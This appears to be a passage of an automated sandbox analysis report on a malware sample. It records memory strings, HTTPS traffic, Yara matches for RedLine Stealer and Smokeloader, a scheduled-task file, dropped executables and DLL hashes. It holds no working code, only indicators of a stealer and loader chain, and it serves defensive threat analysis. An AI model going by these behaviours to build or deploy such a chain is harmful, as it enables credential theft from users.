Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBA64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3292910030.00000132BDD9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA2D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000023.00000002.3259653895.00000132BA0B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA2D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA86B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237687669.00000132AA670000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227805089.00000132C2790000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B61F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208033913.00000132C3C66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBA40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237687669.00000132AA679000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3202991056.00000132C3C69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB4D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCFCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3240579668.00000132B6026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000021.00000002.3106864860.0000022722417000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3121991377.0000029D80AD9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237687669.00000132AA679000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdAll
Source: firefox.exe, 00000023.00000002.3238991466.00000132AC4A7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3238991466.00000132AC460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUse
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account_getBoundsWithoutFlushing.panel-header
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50029 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000012.00000002.3325152088.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.3323737933.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Binary is likely a compiled AutoIt script file
Source: 0d957dbf73.exe, 00000015.00000002.3187753102.0000000001042000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_95d06786-c
Source: 0d957dbf73.exe, 00000015.00000002.3187753102.0000000001042000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_81b54916-2
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: JKECGDBFCB.exe.0.dr Static PE information: section name:
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.14.dr Static PE information: section name:
Source: skotes.exe.14.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: .idata
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: random[2].exe0.17.dr Static PE information: section name:
Source: random[2].exe0.17.dr Static PE information: section name: .idata
Source: 57a07eec2d.exe.17.dr Static PE information: section name:
Source: 57a07eec2d.exe.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: .idata
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name: .idata
Source: random[1].exe1.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name: .idata
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C53B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C53B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C53B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4DF280
Creates files inside the system directory
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4D35A0 0_2_6C4D35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54545C 0_2_6C54545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E5440 0_2_6C4E5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C515C10 0_2_6C515C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C522C10 0_2_6C522C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54AC00 0_2_6C54AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54542B 0_2_6C54542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E64C0 0_2_6C4E64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4FD4D0 0_2_6C4FD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C516CF0 0_2_6C516CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DD4E0 0_2_6C4DD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E6C80 0_2_6C4E6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5334A0 0_2_6C5334A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53C4A0 0_2_6C53C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C500512 0_2_6C500512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4EFD00 0_2_6C4EFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4FED10 0_2_6C4FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C510DD0 0_2_6C510DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5385F0 0_2_6C5385F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C513E50 0_2_6C513E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F4640 0_2_6C4F4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C522E4E 0_2_6C522E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F9E50 0_2_6C4F9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C546E63 0_2_6C546E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DC670 0_2_6C4DC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C517E10 0_2_6C517E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C525600 0_2_6C525600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C539E30 0_2_6C539E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5476E3 0_2_6C5476E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DBEF0 0_2_6C4DBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4EFEF0 0_2_6C4EFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53E680 0_2_6C53E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F5E90 0_2_6C4F5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C534EA0 0_2_6C534EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C517710 0_2_6C517710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E9F00 0_2_6C4E9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C506FF0 0_2_6C506FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DDFE0 0_2_6C4DDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5277A0 0_2_6C5277A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F8850 0_2_6C4F8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4FD850 0_2_6C4FD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51F070 0_2_6C51F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E7810 0_2_6C4E7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51B820 0_2_6C51B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C524820 0_2_6C524820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5450C7 0_2_6C5450C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4FC0E0 0_2_6C4FC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5158E0 0_2_6C5158E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5060A0 0_2_6C5060A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4FA940 0_2_6C4FA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52B970 0_2_6C52B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54B170 0_2_6C54B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4ED960 0_2_6C4ED960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C515190 0_2_6C515190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C532990 0_2_6C532990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50D9B0 0_2_6C50D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DC9A0 0_2_6C4DC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C519A60 0_2_6C519A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C518AC0 0_2_6C518AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51E2F0 0_2_6C51E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F1AF0 0_2_6C4F1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54BA90 0_2_6C54BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C542AB0 0_2_6C542AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4D22A0 0_2_6C4D22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C504AA0 0_2_6C504AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4ECAB0 0_2_6C4ECAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4D5340 0_2_6C4D5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4EC370 0_2_6C4EC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51D320 0_2_6C51D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5453C8 0_2_6C5453C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4DF380 0_2_6C4DF380
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00557049 14_2_00557049
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00558860 14_2_00558860
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_005578BB 14_2_005578BB
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00628101 14_2_00628101
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_005531A8 14_2_005531A8
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00627B6E 14_2_00627B6E
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00514B30 14_2_00514B30
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00552D10 14_2_00552D10
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00514DE0 14_2_00514DE0
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00547F36 14_2_00547F36
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0055779B 14_2_0055779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D778BB 15_2_00D778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D77049 15_2_00D77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D78860 15_2_00D78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D731A8 15_2_00D731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D34B30 15_2_00D34B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D34DE0 15_2_00D34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D72D10 15_2_00D72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D7779B 15_2_00D7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D67F36 15_2_00D67F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D778BB 16_2_00D778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D77049 16_2_00D77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D78860 16_2_00D78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D731A8 16_2_00D731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D34B30 16_2_00D34B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D34DE0 16_2_00D34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D72D10 16_2_00D72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D7779B 16_2_00D7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D67F36 16_2_00D67F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C50CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00D4DF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00D480C0 appears 260 times
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: String function: 005280C0 appears 130 times
PE file contains executable resources (Code or Archives)
Source: random[1].exe0.17.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2533b4b8c7.exe.17.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2619264905.000000006C755000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2618781596.000000006C562000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Uses 32bit PE files
